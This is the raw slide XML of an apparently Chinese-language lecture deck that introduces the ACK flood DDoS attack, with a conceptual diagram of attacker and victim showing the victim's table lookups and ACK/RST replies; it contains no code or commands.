              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191508" name="Picture 28" descr="j0301260">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680FEF91-6D0F-47D3-B5CC-AE813803AA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063" y="5362575"/>
            <a:ext cx="1238250"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354"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="143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4355"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="143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4358"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="143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14361"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14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4" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="14361" grpId="0" bldLvl="0"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D8CA5035-1178-41FE-B859-D92950B13463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341313" y="160338"/>
            <a:ext cx="8451850" cy="415925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>DDoS攻击介绍——ACK Flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193539" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5C11E2-8B65-49CB-BFA1-944632CCDAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705475" y="1684338"/>
            <a:ext cx="3162300" cy="4557712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冲击服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>受害者资源消耗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>查表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>回应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>ACK/RST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流量要较大才会对服务器造成影响</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193540" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76056BE9-2C82-4056-9FFB-6053DBB448F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5580063" y="1341438"/>
            <a:ext cx="1587" cy="51831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3541" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA07248-35ED-4204-8E5B-6D00176FC83B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5580063" y="1341438"/>
            <a:ext cx="179387" cy="15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3542" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5AC7324-9E98-4BE1-A30E-38409681F68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="2162175"/>
            <a:ext cx="2879725" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 154468"/>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3543" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF742522-19DF-4ECB-9D2C-50776D572D59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1935163" y="2262188"/>
            <a:ext cx="2549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ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（你得查查我连过你没）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="193544" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F1F59E4-4F6E-4FF2-B649-0BB9C8D962E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="273050" y="3205163"/>
            <a:ext cx="1504950" cy="1719262"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1296" cy="1984"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="193557" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD7ABB5-4AC2-46FC-AA2A-8FA3989C6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58" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CCA61A1-3003-4C53-B402-DB71FC210D69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="241" y="1632"/>
              <a:ext cx="76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攻击者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="193545" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB5CCDF-F0B6-49E9-BD9C-A675E04BC59C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4067175" y="1773238"/>
            <a:ext cx="1400175" cy="1590675"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1449" cy="2084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="193555" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835BCCB4-05A4-46D3-BDB9-AEDF0E27B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449"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56" name="Text Box 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBD2F4F-7E39-4C59-851B-0CF9E012A4BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="337" y="1681"/>
              <a:ext cx="767"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受害者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193546" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8E48DC-127B-4773-8B13-E083972AFF37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4427538" y="836613"/>
            <a:ext cx="1206500" cy="711200"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43750"/>
              <a:gd name="adj2" fmla="val 70000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>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3547" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C0A86D-1FC1-49B1-9C08-2C8DBB2A6A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4670425" y="969963"/>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3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查查看表内有没有</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16400" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{656C90E3-8CB9-442E-9AC7-5ADC2C249739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="2276475"/>
            <a:ext cx="1009650" cy="939800"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1008" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="193553" name="AutoShape 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{742572F2-5A56-4CA4-8621-4E05F792BCE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1008" cy="864"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -43750"/>
                <a:gd name="adj2" fmla="val 70000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>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400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="193554" name="Text Box 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D106C10-4007-4477-B73C-EF9061229137}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="97" y="193"/>
              <a:ext cx="719" cy="4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3300"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>你就慢慢查吧</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193549" name="Text Box 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAEE74FA-0C9A-4572-9D70-43217496C815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1108075"/>
            <a:ext cx="1879600"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ACK Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193550" name="Text Box 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72721F20-29BF-46EC-B6C3-3FE9641956F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="1125538"/>
            <a:ext cx="2614612"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攻击表象</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193551" name="AutoShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD334A86-BE44-439E-9BD3-E1E40838B271}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1512888" y="2886075"/>
            <a:ext cx="2878137" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 154409"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0000FF"/>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3552" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0747B706-D718-4E02-93D3-BEC219990197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1819275" y="2986088"/>
            <a:ext cx="2547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ACK/RST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（我没有连过你呀）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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6400"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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5586" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E33BCA-158D-4753-8A94-00AFFA65E3C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="1814513"/>
            <a:ext cx="1368425" cy="1487487"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1296" cy="2056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="195621" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53EEF174-270D-4CC8-884B-BD58B59D8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622" name="Text Box 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16C7A97-E54C-4B03-A363-B016E8A830E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="240" y="1631"/>
              <a:ext cx="767"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攻击者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="195587" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB94E46-B0B7-437A-8FA9-4B181FB29BD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3778250" y="3038475"/>
            <a:ext cx="1368425" cy="1614488"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="934" cy="1017"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="195619" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56B966F-CE3F-426A-BA9B-3DF58360A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34" cy="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620" name="Text Box 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76ECBBE0-D664-441D-8C01-D68A3561ABB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="217" y="825"/>
              <a:ext cx="62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受害者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18440" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B0899D-D49A-4689-8557-6278C7A652DB}"/>
              </a:ext>
